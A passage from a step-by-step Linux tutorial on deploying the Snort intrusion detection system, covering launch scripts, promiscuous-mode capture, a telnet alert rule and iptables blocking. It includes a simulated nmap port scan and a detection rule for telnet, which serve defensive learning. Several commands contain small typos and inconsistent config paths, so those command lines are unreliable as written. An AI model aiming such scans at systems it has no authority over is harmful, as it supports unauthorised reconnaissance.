Open the config file in a text editor. For now, make sure that the variable ‘HOME_NET’ accurately describes your network. For example, if your computers have IP addresses that begin at 192.168.0.1, set it to 192.168.0.1/24.

Step 11

Create launch script
Make a startup script to save time. Create an empty file with ‘nano start_snort’, then add the line ‘snort -de -l [full path to script]/snort_logs -c /etc/snort/snort.conf’ to it, and then save. Now type “chmod +x start_ snort”. This will launch snort in IDS mode, with reasonable defaults.


Step 12

Intrusion detection mode
First, find the IP address of the machine running Snort by using ‘ifconfig’ and make a note of it. Now run ‘./start_snort’. Some extra startup information scrolls past as we are now using the Snort configuration file and the rules files that it references.

Step 13

Simulate an attack (Nmap)
We’ll begin by carrying out a port scan on the machine running Snort using Nmap, a common first step in a typical intrusion attempt. From a different machine on your network, type ‘nmap [IP address of Snort machine]’. A file called ‘alert’ should have appeared in the log folder. Examine it.
network sniffer
Simulate an attack

Step 14

Automatically start Snort
The method to launch a script at startup varies between distributions. On Ubuntu, simply add our ‘start_snort’ script to ‘/etc/init’ by typing ‘ln start_snort /etc/init/’. Remember to use fully qualified path names in the script.

Step 15

Protect the network
Protecting an entire network requires either a dedicated Snort machine or a dedicated network adaptor on your server. This is because the network card must be put into promiscuous mode to capture all traffic being transmitted, and this is the scenario we will work with here. Once you have installed the second card and rebooted the machine, determine the naming of the two network interfaces by typing ‘ifconfig’. In this example, the second network card is called ‘eth1’. Now open ‘/etc/networking/interfaces’ in a text editor.

Step 16

Configure promiscuous mode
Add the following lines to the file: ‘iface eth1 inet manual’, ‘up ifconfig $IFACE 0.0.0.0 up’, ‘up ip link set $IFACE promisc on’, ‘down ip link set $IFACE promisc off’, ‘down ifconfig $IFACE down’. Type ‘sudo ifup eth1’ to start up the second Ethernet adaptor and physically plug it into your router, hub or spanning switch.

Step 17

Test promiscuous mode
Type ‘ifconfig’ and eth1 should be listed without an IP address. Now add ‘sudo ifup eth1’ to your Snort startup script along with the flag ‘-i eth1’ on the Snort launch command. When launched, Snort will now monitor all traffic on your network.

Step 18

Create a simple Snort rule
For the sake of simplicity, we are going to add a rule to the configuration file rather than create a new rule file. As root, open up snort.conf in a text editor. On the final line of the configuration file, add the following line: ‘alert tcp any any -> any 23 ( msg: “telnet alert!”; sid: 1; )’.

Step 19

Test simple rule
Launch Snort with ‘snort -dev -l ./snort_logs -c /etc/snort.conf’. From another machine, type ‘telnet [IP address of Snort machine]’. If everything has worked, you should now have an update in the alert file. See the Snort manual for a full breakdown, but open the file and check that source IP and destination IP look correct.

Step 20

Fetch extra rules
Get extra rules from the Snort website (free sign-up required). They belong in ‘/etc/ snort/rules’ and should be enabled using the ‘include’ directive in snort.conf. The comprehensive selection is an excellent starting point for creating your own rules for dealing with, for example, application-specific exploits.

Step 21

Add CSV output module
Unless you know that you are going to have to use Snort alert logs as input for another networking utility, consider switching it to CSV output so that you can view the data in a spreadsheet. Simply add the line ‘output alert_csv: alert.csv default’ to the end of the configuration file.
Network sniffer
Add CSV output module

Step 22

Interpreting an attack
When an attack is logged, begin by looking up the IP address with the ‘whois’ command or by using an online geographic IP lookup address. Note the port number of the attack to try to figure out the service or application that is the focus of the attack.

Step 23

Block an attack (part 1)
Block the IP address of the attacker as reported in the alert file. Obviously, the address can change, but they tend to be fairly static from the most common type of automated attacks. Use the command ‘iptables -A INPUT -s [attacker IP address] -j DROP’.

Step 24

Block an attack (part 2)
It’s possible that an attack is targeting an unused or unimportant port on your network. Use ‘/iptables -A INPUT -p tcp –destination- port 80 -j DROP’ to block a port, if you have determined that it will not harm the normal function of your system. To unblock a port or IP address, use the ‘-D’ switch instead of ‘-A’.